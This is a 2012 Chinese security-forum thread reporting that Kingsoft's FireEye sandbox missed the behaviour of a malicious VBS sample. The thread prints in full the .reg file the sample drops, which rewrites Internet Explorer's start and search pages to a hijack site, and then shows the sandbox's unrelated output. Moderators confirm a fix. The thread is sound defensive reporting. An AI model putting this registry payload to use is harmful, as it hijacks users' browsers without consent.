收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 国内杀毒软件 火眼的一点小BUG
返回列表 发新帖
查看: 1915|回复: 4
收起左侧

[金山] 火眼的一点小BUG

[复制链接]
virusdefender
发表于 2012-12-27 23:10:55 | 显示全部楼层 |阅读模式
看这个样本

http://bbs.kafan.cn/thread-1436025-1-1.html

那个vbs会释放一个reg文件并导入注册表

reg文件内容
  1. Windows Registry Editor Version 5.00

  3. [HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main]
  4. "Start Page"="http://www.1149.cn/"
  5. "Search Bar"="http://www.1149.cn/"
  6. "Search Page"="http://www.1149.cn/"
  7. "First Home Page"="http://www.1149.cn/"

  9. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
  10. "Default_Page_URL"="http://www.1149.cn/"
  11. "SearchAssistant"="http://www.1149.cn/"
  12. "Default_Search_Url"="http://www.1149.cn/"

  14. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
  15. "SearchAssistant"="http://www.1149.cn/"

  17. [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
  18. "Search Page"="http://www.1149.cn/"
  19. "Search Bar"="http://www.1149.cn/"
  20. "Start Page"="http://www.1149.cn/"
  21. "Default_Page_URL"="http://www.1149.cn/"
  22. "Default_Search_Url"="http://www.1149.cn/"

  24. [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
  25. "SearchAssistant"="http://www.1149.cn/"

  27. [HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
  28. @=""C:\\Program Files\\Internet Explorer\\iexplore.exe" http://www.1149.cn/"

  30. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
  31. @="C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.1149.cn"
复制代码
那个文件会修改主页和搜索

但是把文件上传到火眼http://fireeye.ijinshan.com/anal ... f9a&type=1#full

但是我们可以看到
  1. HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam
  2. [(NULL)] = [DDDDDDDDDDDDDDD]
  3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\HelpSvc\Backup
  4. [PackageStore] = [\x51\x43\x31\x03\x01...]
  5. [CRC_Registry] = [0x8dd1e3c3]
  6. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\PchSvc
  7. [DataCollection] = [20121108151625.000000-000]
  8. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
  9. [Merger Batching Threshold] = [0x00020000]
  10. [Merger Throttling Threshold] = [0x0000000a]
  11. [Merger Release Threshold] = [0x00000005]
  12. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\S-1-5-21-1123561945-789336058-839522115-500\Extension-List\{00000000-0000-0000-0000-000000000000}
  13. [EndTimeLo] = [0x11c4e7ad]
  14. [EndTimeHi] = [0x01cdbd99]
  15. [StartTimeHi] = [0x01cdbd99]
  16. [StartTimeLo] = [0x11bdc09f]
复制代码
我们reg文件导入的信息呢,从这里面根本看不出来这个文件的真实面目

可能就是火眼在处理vbs文件的一个bug

请把该信息传达给金山官人~~
回复

举报

sxyuqiao
发表于 2012-12-28 08:53:17 | 显示全部楼层
已经传达,感谢反馈
回复

举报

xinqian_Jc
发表于 2012-12-28 11:03:08 | 显示全部楼层
本帖最后由 xinqian_Jc 于 2012-12-28 11:04 编辑

http://fireeye.ijinshan.com/analyse.html?md5=782f1ca1568051ba4434d1ab58875f9a#full

问题已修复,感谢反馈。
回复

举报

高压气瓶
发表于 2012-12-28 18:29:02 | 显示全部楼层
感谢楼主反馈问题,这个问题已经修复了,请在查看下报告:
http://fireeye.ijinshan.com/anal ... 34d1ab58875f9a#full
回复

举报

1768644894
头像被屏蔽
发表于 2012-12-28 20:39:10 | 显示全部楼层
有木马,我的小A在下载是就报发现特洛伊木马了
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-19 10:56 , Processed in 0.125163 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表